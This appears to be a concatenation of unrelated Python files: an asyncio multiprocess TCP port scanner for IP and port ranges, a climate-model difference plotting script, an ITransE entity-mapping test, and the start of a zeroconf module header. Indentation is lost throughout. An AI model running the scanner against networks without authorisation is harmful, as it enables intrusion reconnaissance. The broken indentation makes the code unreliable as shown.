if task == 0:
break
eg=eq_put_y(task,workers,procs)
#print('[eq_put_iplist]task =',task)
a=task;task=next(eg)
for i in range(task,a):
eql=[]
eql.append(ipseed[i])
eql.append('list')
eql.append(wqport)
print('[eq_put_iplist]eql :',eql,'task=',task)
eq.put(eql)
elif task == 0:
break
ee.clear()
ee.wait()
def eq_put_fast(task,workers,ipseed,port_g):
portlist=[]
iplist=[]
def eq_put_fast_set(iplist,portlist):
eql=[]
eql.append(iplist)
eql.append('fast')
eql.append(portlist)
print('[eq_put_iplist_fast]eql :',eql)
return eql
ipseed_t=type(ipseed)
if ipseed_t == list:
for ip in ipseed:
iplist.append(ip)
elif ipseed_t == tuple:
ipg=iprange_g.ip_iter(ipseed[0],task)
for ip in ipg:
iplist.append(ip)
n=0
for p in port_g:
n+=1
portlist.append(p)
if n == workers:
while True:
if not eq.full():
eql=eq_put_fast_set(iplist,portlist)
eq.put(eql)
portlist=[]
n=0
break
else:
ee.clear()
ee.wait()
while True:
if not eq.full() and len(portlist) != 0:
eql=eq_put_fast_set(iplist,portlist)
eq.put(eql)
elif len(portlist) == 0:
return
else:
ee.clear()
ee.wait()
def get_ip_g(check_ip,host,ipr):
if check_ip > 0:
ipseed=iprange_g.set_seed(ipr)
elif check_ip == 0:
ipseed=host
return ipseed
def get_port_g(check_port,ps,pe,sp):
if check_port > 0:
port_g=ports_g.port_range(ps,pe)
elif check_port == 0:
port_g=ports_g.port_list(sp)
return port_g
def efunc():
global alltask,workers,procs,chekc_ip,check_port,ps,pe,sp,host,ipr
print('[efunc]event tid',threading.current_thread().name,'is starting...')
port_g=get_port_g(check_port,ps,pe,sp)
ipseed_type=get_ip_g(check_ip,host,ipr)
print('[efunc]port_g:',port_g,'|ipseed_type:',type(ipseed_type))
if alltask < procs:
eq_put_fast(alltask,workers,ipseed_type,port_g)
elif alltask >= procs:
if type(ipseed_type) == tuple:
while True:
try:
wqport=next(port_g)
#print('[efunc]wqport:',wqport)
except:
break
task=alltask
eq_put_iprange(task,workers,procs,ipseed_type[0],wqport)
elif type(ipseed_type) == list:
while True:
try:
wqport=next(port_g)
#print('[efunc]wqport:',wqport)
except:
break
task=alltask
eq_put_iplist(task,workers,procs,ipseed_type,wqport)
#print('[efunc]task =',task,'et set',et.is_set(),'| ee set',ee.is_set())
n=0
while True:
while not eq.full():
n+=1
if n <= procs:
eq.put('done')
#print('[efunc]n =',n,'eq empty',eq.empty(),'ee set:',ee.is_set())
if procs == 1:
ee.clear()
return
elif n > procs and eq.empty():
return
ee.clear()
ee.wait()
return
def progress():
global alltask,procs,ports,st,progress_count,allcount
bartask=alltask*ports
print('[progress]workers are running...bartask:',bartask)
ee.wait()
for _ in range(procs):
print('[progress]worker pid :',state_pid.get())
while True:
time.sleep(1)
pgbar.bar(bartask,progress_count.value,50,st)
print('[progress]progress_count=',progress_count.value,'allcount=',allcount.value)
if bartask == allcount.value:
pgbar.bar(bartask,allcount.value,50,st)
break
def c_e_th():
pevent=threading.Thread(target=efunc,name='pevent_tid='+str(os.getpid())+'/0')
#pgbar_th=threading.Thread(target=progress,name='progress_th')
pevent.start()
#pgbar_th.start()
#pgbar_th.join()
pevent.join()
print('\n[c_e_th]there is no more task,efunc done,use time:%.2f' % (time.time()-st)+'s')
print('='*60)
return
def pefunc():
print('[pefunc]pid',os.getpid(),'pefunc is starting......')
c_e_th()
print('[pefunc]pefunc done......')
return
###################################################################################
def eq_get(we):
global wg_ready,weqget,wqport,ip_g
wg_ready=True
wqe=[]
wqport=None
ip_g=None
if not eq.empty() and weqget:
wqe=eq.get()
print('[eq_get]pid',os.getpid(),'wqe=',wqe)
eq.task_done()
#print('[eq_get]pid-%s wqe=%s'%(os.getpid(),wqe))
tag=wqe[-2]
if wqe != 'done' and wqe != [] and tag != 'fast' and tag != 'list':
wqport=wqe.pop()
ipcounts=wqe.pop()
ipseed=wqe.pop()
#print('[eq_get]wqe:',wqe)
ip_g=iprange_g.ip_iter(ipseed,ipcounts)
wg_ready=False
we.set()
ee.set()
elif wqe != 'done' and wqe != [] and tag == 'fast':
wqe.pop(-2)
wqport=wqe.pop()
#print('[eq_get]wqe:',wqe)
ip_g=(x for x in wqe.pop())
wg_ready=False
we.set()
ee.set()
elif wqe != 'done' and wqe != [] and tag == 'list':
wqe.pop(-2)
wqport=wqe.pop()
#print('[eq_get]wqe:',wqe)
ip_g=(x for x in wqe.pop())
wg_ready=False
we.set()
ee.set()
elif wqe == 'done':
weqget=False
ee.set()
#print('[eq_get]pid-%s [%s,%s] | eq empty:%s | weqget=%s'%(os.getpid(),wqa,wqb,eq.empty(),weqget))
elif eq.empty() and weqget:
ee.set()
eq_get()
elif eq.empty() and not weqget:
return
def wq_put(we):
global wg_ready,wqport,ip_g,weqget
we.wait()
if weqget:
if type(wqport) == list:
while not wq.full():
try:
x=next(ip_g)
except:
we.clear()
if wg_ready:
pass
else:
if not wg_ready and weqget:
eq_get(we)
elif not weqget:
return
for p in wqport:
s=None
s=(x,p)
#print('[wq_put]x=',x)
wq.put(s)
else:
while not wq.full():
try:
x=next(ip_g)
#print('[wq_put]pid',os.getpid(),'x=',x)
except:
#print('[wq_put]pid',os.getpid(),'x=None,ip_g is stop|wg_ready:',wg_ready)
we.clear()
if wg_ready:
pass
else:
if not wg_ready and weqget:
eq_get(we)
elif not weqget:
return
x=(x,wqport)
#print('[wq_put]x=',x)
wq.put(x)
async def work(loop,we):
global opencount,closecount,ptime,progress_count
while True:
addr=None
con=''
wst=time.time()
if not wq.empty():
addr = wq.get()
#print('[work]pid',os.getpid(),'get addr:',addr)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(0)
progress_count.value+=1
try:
con=await loop.sock_connect(s,addr)
except OSError as err:
closecount+=1
err=str(err)
std='%s,%s,%s\n'%(addr[0],addr[1],err)
res_cache.append(std)
#print('[work]pid',os.getpid(),addr,err)
if con == None:
opencount+=1
#print('pid',os.getpid(),addr,'open')
std='%s,%s,open\n'%(addr[0],addr[1])
res_cache.append(std)
s.close()
ptime+=time.time()-wst
elif weqget and wq.empty():
wq_put(we)
elif addr == None and not weqget:
#print('[work]pid',os.getpid(),'progress_count.value',progress_count.value)
break
return
def res_thread(workers,res_cache):
global weqget,work_done
print('[res_thread]res_thread tid',threading.current_thread().name,'is starting...')
while True:
#print('[res_thread]pid',os.getpid(),'weqget:',weqget)
if not work_done:
res_save(workers,res_cache)
elif work_done:
while len(res_cache):
res_save(workers,res_cache)
break
time.sleep(1)
return
def res_save(workers,res_cache):
v=''
for i in range(workers):
try:
v+=res_cache.pop()
except:
continue
try:
reslog.write(v)
except:
errlist.append(v)
reslog.flush()
return
def pwfunc():
global alltime,allcount,work_done
#print('[pwfunc]pid-',os.getpid(),'is running...')
state_pid.put(os.getpid())
res_save_thread=threading.Thread(target=res_thread,args=(workers,res_cache),name='res_thread_tid='+str(os.getpid()))
res_save_thread.start()
we=asyncio.Event()
we.set()
selloop=asyncio.SelectorEventLoop()
asyncio.set_event_loop(selloop)
loop = asyncio.get_event_loop()
corus = prepare(workers,loop,we)
fs=asyncio.gather(*corus)
loop.run_until_complete(fs)
loop.close()
work_done=True
res_save_thread.join()
alltime.value+=ptime
#print('[pwfunc]pid',os.getpid(),'ee set:',ee.is_set())
#print('\ntracemalloc:',tracemalloc.get_traced_memory())
print('[pwfunc]pid=%s\treal time:%.4fs\topen_counts:%s\tclose_counts:%s' % (os.getpid(),ptime,opencount,closecount))
print('[pwfunc]pid=%s\tuse time:%.4fs'%(os.getpid(),time.time()-st)+'\twq empty:'+str(wq.empty())+'\tres_err count:'+str(len(errlist)))
while len(errlist):
reslog.write('err:\t'+errlist.pop())
reslog.flush()
return os.getpid(),opencount,closecount
def cb_w_p_fin(result):
global p_fin_c,procs,opencount,closecount
opencount+=result[1]
closecount+=result[2]
p_fin_c.append(result[0])
#print('[cb_w_p_fin]',p_fin_c)
if len(p_fin_c) == procs:
p_wfunc.terminate()
return
def workers_y(a,loop,we):
for i in range(a):
yield work(loop,we)
def prepare(workers,loop,we):
count=0
corus=[]
workers_g=workers_y(workers,loop,we)
while True:
try:
x = next(workers_g)
except:
break
corus.append(x)
count+=1
print('[prepare]pid-%s workers is ready'%os.getpid())
return corus
############################################################################
def delcache():
cachedir='__pycache__'
try:
os.chdir(cachedir)
except:
return
flist=os.listdir()
while True:
try:
os.remove(flist.pop())
except:
os.rmdir('../'+cachedir)
os.chdir('../')
return
return
def check_input():
parser=argparse.ArgumentParser(description='set host or ip range what will be scaned,input port range with int.default scan ports 1-1024.')
parser.add_argument("-v", "--version",action='version', version='%(prog)s 1.0')
parser.add_argument('-host',type=str,nargs='*',default='127.0.0.1',help="set host list like '192.168.0.1 192.168.0.2' default 127.0.0.1")
parser.add_argument('-range',type=str,help="set ip range to scan like '192.168.0.1-192.168.1.1' just once")
parser.add_argument('-ps',type=int,nargs='?',default=1,help='set start port vaule')
parser.add_argument('-pe',type=int,nargs='?',default=1024,help='set end port vaule')
parser.add_argument('-sp',type=int,nargs='+',help="set specify port vaule like '80 135 137'")
parser.add_argument('-procs',type=int,nargs='?',default=os.cpu_count(),help='set multiprocessing to running')
parser.add_argument('-workers',type=int,nargs='?',default=1,help='set workers to running')
parser.parse_args()
args=parser.parse_args()
ps=args.ps
pe=args.pe
sp=args.sp
host=args.host
ipr=args.range
procs=args.procs
workers=args.workers
if type(procs) != int and procs > (os.cpu_count()*16):
print('please set right procs number here and not greater than %s.'%(os.cpu_count()*16))
sys.exit()
elif type(workers) != int and workers > (65536/(os.cpu_count()*16)):
print('please set right workers number here and not greater than %s.'%(65536/(os.cpu_count()*16)))
sys.exit()
ip=iprange_g.check_iprange(ipr)
host=iprange_g.check_host(host)
port=ports_g.check_p(ps,pe)
portlist=ports_g.check_p(sp)
if ip and portlist:
print("ip range :",ip)
ipseed=iprange_g.set_seed(ip)
ipcounts=iprange_g.ip_counts(ipseed)
print("the ip range start ",ipseed[0]," counts ",ipcounts)
return ipcounts,len(sp),1,0,workers,procs,ps,pe,sp,host,ip
elif host and portlist:
print("ip range :",host)
return len(host),len(sp),0,0,workers,procs,ps,pe,sp,host,ip
elif ip and port:
print("ip range :",ip)
ipseed=iprange_g.set_seed(ip)
ipcounts=iprange_g.ip_counts(ipseed)
print("the ip range start ",ipseed[0]," counts ",ipcounts)
return ipcounts,pe-ps+1,1,1,workers,procs,ps,pe,sp,host,ip
elif host and port:
print("ip range :",host)
return len(host),pe-ps+1,0,1,workers,procs,ps,pe,sp,host,ip
else:
print("please set ipaddr/port numbers or range")
sys.exit(0)
############################################################################################
if __name__=='__main__':
alltask,ports,check_ip,check_port,workers,procs,ps,pe,sp,host,ipr=check_input()
print('[mian]alltask:%s ports:%s check_ip:%s check_port:%s'%(alltask,ports,check_ip,check_port))
#tracemalloc.start()
st=time.time()
delcache()
#public var set
eq=JoinableQueue(procs)
state_pid=Queue()
alltime=Value('d',0.0)
#allcount=Value('i',0)
progress_count=Value('i',0)
#log file set
fname='./result.log'
try:
os.remove(fname)
except:
pass
os.path.exists(fname)
reslog=open(fname,'a')
#start procs
ee=Event()
p_efunc=Process(target=pefunc)
p_efunc.start()
#set var to work procs
wq=queue.Queue(int(workers*procs))
weqget=True
ip_g=None
wqport=None
wg_ready=False
work_done=False
ptime=0
opencount=0
closecount=0
wq_cache=[]
res_cache=[]
errlist=[]
p_fin_c=[]
p_wfunc=Pool(procs)
for _ in range(procs):
p_wfunc.apply_async(pwfunc,callback=cb_w_p_fin)
p_wfunc.close()
p_efunc.join()
p_wfunc.join()
print('\n[main]all works done,saved to %s'%fname)
reslog.close()
print('\nResult of Execution :')
print('\nprocs : %s\tcorus : %s\tqueue maxsize : %s' % (procs,workers,wq.maxsize))
print('real time:%.4fs\topened:%s\tclosed:%s\tall:%s'%(alltime.value,opencount,closecount,opencount+closecount))
print('use time: %.4f' % (time.time()-st)+'s')
|
plot_from_pp_geop_height_pot_temp_and_wind_diff_by_date_range.py
|
"""
Load pp, plot and save
8km difference
"""
import os, sys
#%matplotlib inline
#%pylab inline
import matplotlib
#matplotlib.use('Agg')
# Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
import scipy.interpolate
import pdb
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
model_name_convert_legend = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_legend.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file_contourf = 'temp'
pp_file_contour ='408'
plot_diag='temp'
#plot_diags=['sp_hum']
plot_levels = [925]
#experiment_ids = ['dkmbq', 'dklyu']
experiment_ids = ['djzny', 'djznw', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#Experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkbhu', 'djznu', 'dkhgu' ] # All 12
#experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklwu', 'dklzq', 'dkbhu',] # All 12
#experiment_ids = ['dkbhu', 'dkjxq']
#experiment_ids = ['dkmbq', 'dklyu', 'djznw', 'djzny', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#experiment_ids = ['dklyu, dkmgw']
experiment_ids = ['dklyu']
diff_id='dkmgw'
#min_contour = 0
#max_contour = 3
#tick_interval=0.3
#clevs = np.linspace(min_contour, max_contour,64)
#cmap=cm.s3pcpn_l
cmap = plt.cm.RdBu_r
#ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
pp_file_path = '/nfs/a90/eepdw/Data/EMBRACE/'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
from iris.coord_categorisation import add_categorised_coord
# def add_hour_of_day(cube, coord, name='hour'):
# add_categorised_coord(cube, name, coord,
# lambda coord, x: coord.units.num2date(x).hour)
figprops = dict(figsize=(8,8), dpi=100)
#cmap=cm.s3pcpn_l
un = unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
lon_high = 101.866
lon_low = 64.115
lat_high = 33.
lat_low =-6.79
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
def main():
for p_level in plot_levels:
# Set pressure height contour min/max
if p_level == 925:
clev_min = -72.
clev_max = 72.
elif p_level == 850:
clev_min = -72.
clev_max = 72.
elif p_level == 700:
clev_min = -72.
clev_max = 72.
elif p_level == 500:
clev_min = -72.
clev_max = 72.
else:
print 'Contour min/max not set for this pressure level'
# Set potential temperature min/max
if p_level == 925:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 850:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 700:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 500:
clevpt_min = -3.
clevpt_max = 3.
else:
print 'Potential temperature min/max not set for this pressure level'
# Set specific humidity min/max
if p_level == 925:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 850:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 700:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 500:
clevsh_min = -0.0025
clevsh_max = 0.0025
else:
print 'Specific humidity min/max not set for this pressure level'
#clevs_col = np.arange(clev_min, clev_max)
clevs_lin = np.arange(clev_min, clev_max, 4.)
p_level_constraint = iris.Constraint(pressure=p_level)
#for plot_diag in plot_diags:
for experiment_id in experiment_ids:
expmin1 = experiment_id[:-1]
diffmin1 = diff_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s_on_p_levs_mean_by_date_range.pp' % (expmin1, experiment_id, experiment_id, pp_file_contourf)
pfile_diff = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s_on_p_levs_mean_by_date_range.pp' % (diffmin1, diff_id, diff_id, pp_file_contourf)
pcube_contourf = iris.load_cube(pfile, p_level_constraint)
#pcube_contourf=iris.analysis.maths.multiply(pcube_contourf,3600)
pcube_contourf_diff = iris.load_cube(pfile_diff, p_level_constraint)
#pcube_contourf_diff=iris.analysis.maths.multiply(pcube_contourf_diff,3600)
#pdb.set_trace()
height_pp_file = '%s_%s_on_p_levs_mean_by_date_range.pp' % (experiment_id, pp_file_contour)
height_pfile = '%s%s/%s/%s' % (pp_file_path, expmin1, experiment_id, height_pp_file)
height_pp_file_diff = '%s_%s_on_p_levs_mean_by_date_range.pp' % (diff_id, pp_file_contour)
height_pfile_diff = '%s%s/%s/%s' % (pp_file_path, diffmin1, diff_id, height_pp_file_diff)
#pdb.set_trace()
pcube_contour = iris.load_cube(height_pfile, p_level_constraint)
pcube_contour_diff = iris.load_cube(height_pfile_diff, p_level_constraint)
pcube_contourf=pcube_contourf-pcube_contourf_diff
pcube_contour=pcube_contour-pcube_contour_diff
del pcube_contourf_diff, pcube_contour_diff
time_coords = pcube_contourf.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contourf, time_coords, name='day_of_year')
time_coords = pcube_contour.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contour, time_coords, name='day_of_year')
fu = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_30201_mean_by_date_range.pp' \
% (expmin1, experiment_id, experiment_id)
fu_diff = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_30201_mean_by_date_range.pp' \
% (diffmin1, diff_id, diff_id)
#pdb.set_trace()
u_wind,v_wind = iris.load(fu, p_level_constraint)
u_wind_diff,v_wind_diff = iris.load(fu_diff, p_level_constraint)
u_wind = u_wind - u_wind_diff
v_wind = v_wind - v_wind_diff
del u_wind_diff, v_wind_diff
for t, time_cube in enumerate(pcube_contourf.slices(['grid_latitude', 'grid_longitude'])):
#pdb.set_trace()
#height_cube_slice = pcube_contour.extract(iris.Constraint(day_of_year=time_cube.coord('day_of_year').points))
height_cube_slice = pcube_contour[t]
u_wind_slice = u_wind[t]
v_wind_slice = v_wind[t]
#pdb.set_trace()
# Get time of averagesfor plot title
h = un.num2date(np.array(time_cube.coord('time').points, dtype=float)[0]).strftime('%d%b')
#Convert to India time
# from_zone = tz.gettz('UTC')
# to_zone = tz.gettz('Asia/Kolkata')
# h_utc = un.num2date(np.array(time_cube.coord('day_of_year').points, dtype=float)[0]).replace(tzinfo=from_zone)
# h_local = h_utc.astimezone(to_zone).strftime('%H%M')
### Winds
cs_w = u_wind_slice.coord_system('CoordSystem')
lat_w = u_wind_slice.coord('grid_latitude').points
lon_w = u_wind_slice.coord('grid_longitude').points
lons_w, lats_w = np.meshgrid(lon_w, lat_w)
lons_w,lats_w = iris.analysis.cartography.unrotate_pole(lons_w,lats_w, cs_w.grid_north_pole_longitude, cs_w.grid_north_pole_latitude)
lon_w=lons_w[0]
lat_w=lats_w[:,0]
### Regrid winds to 2 degree spacing
lat_wind_1deg = np.arange(lat_low,lat_high, 2)
lon_wind_1deg = np.arange(lon_low,lon_high, 2)
#pdb.set_trace()
lons_wi, lats_wi = np.meshgrid(lon_wind_1deg, lat_wind_1deg)
fl_la_lo = (lats_w.flatten(),lons_w.flatten())
p_levs = u_wind_slice.coord('pressure').points
sc = np.searchsorted(p_levs, p_level)
u = scipy.interpolate.griddata(fl_la_lo, u_wind_slice.data.flatten(), (lats_wi, lons_wi), method='linear')
v = scipy.interpolate.griddata(fl_la_lo, v_wind_slice.data.flatten(), (lats_wi, lons_wi), method='linear')
################################### # PLOT ##############################################
fig = plt.figure(**figprops)
#cmap=plt.cm.RdBu_r
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
m =\
Basemap(llcrnrlon=lon_low,llcrnrlat=lat_low,urcrnrlon=lon_high,urcrnrlat=lat_high, rsphere = 6371229)
#pdb.set_trace()
# lat = pcube_contourf.coord('grid_latitude').points
# lon = pcube_contourf.coord('grid_longitude').points
# cs = cube.coord_system('CoordSystem')
# lons, lats = np.meshgrid(lon, lat)
# lons, lats = iris.analysis.cartography.unrotate_pole\
# (lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
# x,y = m(lons,lats)
#x_w,y_w = m(lons_wi, lats_wi)
if plot_diag=='temp':
min_contour = clevpt_min
max_contour = clevpt_max
cb_label='K'
main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), potential temperature (colours),\
and wind (vectors) %s' % h
tick_interval=2
clev_number=max_contour-min_contour+1
elif plot_diag=='sp_hum':
min_contour = clevsh_min
max_contour = clevsh_max
cb_label='kg/kg'
main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), specific humidity (colours),\
and wind (vectors) %s' % h
tick_interval=0.002
clev_number=max_contour-min_contour+0.001
clevs = np.linspace(min_contour, max_contour, clev_number)
clevs = np.linspace(min_contour, max_contour, 32)
#clevs=np.linspace(-10.,10.,32)
# #clevs = np.linspace(-3, 3, 32)
# cont = plt.contourf(x,y,time_cube.data, clevs, cmap=cmap, extend='both')
#cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
lat = time_cube.coord('grid_latitude').points
lon = time_cube.coord('grid_longitude').points
lons, lats = np.meshgrid(lon, lat)
cs = time_cube.coord_system('CoordSystem')
lons,lats = iris.analysis.cartography.unrotate_pole(lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
cont = plt.contourf(lons, lats, time_cube.data, clevs, cmap=cmap, extend='both')
#pdb.set_trace()
cs_lin = plt.contour(lons, lats, height_cube_slice.data, clevs_lin,colors='#262626',linewidths=1.)
plt.clabel(cs_lin, fontsize=14, fmt='%d', color='black')
#del time_cube
#plt.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
x_w,y_w = m(lons_wi, lats_wi)
wind = m.quiver(x_w,y_w, u, v,scale=75, color='#262626' )
qk = plt.quiverkey(wind, 0.1, 0.1, 1, '5 m/s', labelpos='W')
cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
cbar.set_label('%s' % cb_label, fontsize=10, color='#262626')
cbar.set_label(time_cube.units, fontsize=10, color='#262626')
cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
cbar.ax.tick_params(labelsize=10, color='#262626')
#main_title='Mean Rainfall for EMBRACE Period -%s UTC (%s IST)' % (h, h_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
file_save_name = '%s_minus_%s_%s_and_%s_%s_hPa_geop_height_and_wind_%s' \
% (experiment_id, diff_id, pp_file_contour, pp_file_contourf, p_level, h)
save_dir = '%s%s/%s_and_%s' % (save_path, experiment_id, pp_file_contour, pp_file_contourf)
if not os.path.exists('%s' % save_dir): os.makedirs('%s' % (save_dir))
#plt.show()
plt.title('%s-%s %s' % (str(model_name_convert_legend.main(experiment_id)), str(model_name_convert_legend.main(diff_id)), h))
fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
#fig.savefig('%s/%s_short_title.png' % (save_dir, file_save_name) , format='png', bbox_inches='tight')
#plt.show()
#model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
#plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
#fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
|
test_ITransE_lan_mapping_cn.py
|
import sys
import os
new_path = os.path.join(os.path.dirname(__file__), '../../src/ITransE')
sys.path.append(new_path)
from ITransE import ITransE
import time
import multiprocessing
from multiprocessing import Process, Value, Lock, Manager, Array
import numpy as np
from numpy import linalg as LA
fmap = os.path.join(os.path.dirname(__file__), '../../data/CN3l/en_de/en2de_cn.csv')
fmap2 = os.path.join(os.path.dirname(__file__), '../../data/CN3l/en_de/de2en_cn.csv')
fmodel = os.path.join(os.path.dirname(__file__), 'model_ItransE_cn_ed.bin')
ofile1 = os.path.join(os.path.dirname(__file__), '../../results/C_test_en2de_score_I.txt')
ofile4 = os.path.join(os.path.dirname(__file__), '../../results/C_test_de2en_score_I.txt')
ef_map = {}
fe_map = {}
vocab_e = []
vocab_f = []
topK = 10
model = ITransE()
model.load(fmodel)
def seem_hit(x, y):
for i in y:
if x.find(i) > -1 or i.find(x) > -1:
return True
return False
for line in open(fmap):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_e.append(line[0])
if ef_map.get(line[0]) == None:
ef_map[line[0]] = [line[1]]
else:
ef_map[line[0]].append(line[1])
for line in open(fmap2):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_f.append(line[0])
if fe_map.get(line[1]) == None:
fe_map[line[1]] = [line[0]]
else:
fe_map[line[1]].append(line[0])
print "Loaded en_de de_en mappings."
#en:...
manager = Manager()
lock1 = Lock()
past_num = Value('i', 0, lock=True)
score = manager.list()#store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
cpu_count = multiprocessing.cpu_count()
t0 = time.time()
def test(model, vocab, index, src_lan, tgt_lan, map, score, past_num):
while index.value < len(vocab):
id = index.value
index.value += 1
word = vocab[id]
if id % 100 == 0:
print id ,'/', len(vocab), ' time used ',time.time() - t0
print score
print rank.value
tgt = map.get(word)
cand = model.kNN_entity_name(word, src_lan, tgt_lan, topK)
cand = [x[0] for x in cand]
tmp_score = np.zeros(topK)
hit = False
last_i = 0
cur_rank = None
if tgt == None:
continue
for i in range(len(cand)):
last_i = i
tmp_cand = cand[i]
if hit == False and (seem_hit(tmp_cand, tgt) == True or tmp_cand[0] == word):
hit = True
if hit == True:
tmp_score[i] = 1.0
if cur_rank == None:
cur_rank = i
while last_i < topK:
if hit:
tmp_score[last_i] = 1.0
last_i += 1
if len(score) == 0:
score.append(tmp_score)
else:
with lock1:
score[0] = (score[0] * past_num.value + tmp_score) / (past_num.value + 1.0)
past_num.value += 1
if cur_rank != None:
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
continue
tmp_dist = 2
vec_t = None
vec_s = model.entity_transfer_vec(word, src_lan, tgt_lan)
for tmp_vec in tgt:
tmp_vec_t = model.entity_vec(tmp_vec, tgt_lan)
if tmp_vec_t is None:
continue
cur_dist = LA.norm(tmp_vec_t - vec_s)
if cur_dist < tmp_dist:
tmp_dist = cur_dist
vec_t = tmp_vec_t
if vec_t is None:
continue
cur_rank = model.entity_rank(vec_s, vec_t, tgt_lan)
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_e, index, 'en', 'de', ef_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile1, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print 'Finished testing en to de'
#de:...
manager = Manager()
past_num = Value('i', 0, lock=True)
score = manager.list()#store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_f, index, 'de', 'en', fe_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile4, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print 'Finished testing de to en'
|
_core.py
|
""" Multicast DNS Service Discovery for Python, v0.14-wmcbrine
Copyright 2003 Paul Scott-Murphy, 2014 William McBrine
